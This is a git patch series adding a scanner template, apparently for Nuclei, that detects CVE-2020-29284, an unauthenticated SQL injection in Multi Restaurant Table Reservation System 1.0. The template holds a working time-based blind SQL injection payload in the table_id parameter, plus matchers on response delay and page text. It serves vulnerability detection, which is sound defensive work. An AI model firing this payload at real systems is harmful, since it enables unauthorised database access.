From 37aaddf1ffc538f797ea652cc4045716d296f225 Mon Sep 17 00:00:00 2001 From: edoardottt Date: Fri, 30 Sep 2022 19:18:41 +0200 Subject: [PATCH 1/3] Add CVE-2020-29284 --- cves/2020/CVE-2020-29284.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2020/CVE-2020-29284.yaml diff --git a/cves/2020/CVE-2020-29284.yaml b/cves/2020/CVE-2020-29284.yaml new file mode 100644 index 0000000000..baf9ee5769 --- /dev/null +++ b/cves/2020/CVE-2020-29284.yaml @@ -0,0 +1,29 @@ +id: CVE-2020-29284 + +info: + name: Multi Restaurant Table Reservation System 1.0 - SQL Injection + author: edoardottt + severity: critical + description: | + The file view-chair-list.php in Multi Restaurant Table Reservation System 1.0 does not perform input validation on the table_id parameter which allows unauthenticated SQL Injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability. + reference: + - https://www.exploit-db.com/exploits/48984 + - https://nvd.nist.gov/vuln/detail/CVE-2020-29284 + classification: + cve-id: CVE-2020-29284 + tags: cve,tablereservation,cve2020,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/TableReservation/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)--+-" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'duration>=5' + + - type: status + status: + - 200 \ No newline at end of file From 183af7982662024b50f73e3b1c3a91b1c0822c55 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 15 Nov 2022 17:50:07 +0530 Subject: [PATCH 2/3] Update CVE-2020-29284.yaml --- cves/2020/CVE-2020-29284.yaml | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/cves/2020/CVE-2020-29284.yaml b/cves/2020/CVE-2020-29284.yaml index baf9ee5769..c7c8117bc7 100644 --- a/cves/2020/CVE-2020-29284.yaml +++ b/cves/2020/CVE-2020-29284.yaml @@ -8,22 +8,32 @@ info: The file view-chair-list.php in Multi Restaurant Table Reservation System 1.0 does not perform input validation on the table_id parameter which allows unauthenticated SQL Injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability. reference: - https://www.exploit-db.com/exploits/48984 + - https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip - https://nvd.nist.gov/vuln/detail/CVE-2020-29284 classification: cve-id: CVE-2020-29284 - tags: cve,tablereservation,cve2020,sqli + metadata: + verified: true + tags: cve,cve2020,tablereservation,sqli requests: - method: GET path: - - "{{BaseURL}}/TableReservation/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)--+-" + - "{{BaseURL}}/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-" matchers-condition: and matchers: - type: dsl dsl: - - 'duration>=5' + - 'duration>=6' + + - type: word + part: body + words: + - "Restaurent Tables" + - "Chair List" + condition: and - type: status status: - - 200 \ No newline at end of file + - 200 From 46c5abc967e19f5d3792d8e6486144bd85f0ead1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 16 Nov 2022 14:12:46 +0530 Subject: [PATCH 3/3] Update CVE-2020-29284.yaml --- cves/2020/CVE-2020-29284.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-29284.yaml b/cves/2020/CVE-2020-29284.yaml index c7c8117bc7..28685be2d0 100644 --- a/cves/2020/CVE-2020-29284.yaml +++ b/cves/2020/CVE-2020-29284.yaml @@ -14,7 +14,7 @@ info: cve-id: CVE-2020-29284 metadata: verified: true - tags: cve,cve2020,tablereservation,sqli + tags: cve,cve2020,tablereservation,sqli,unauth requests: - method: GET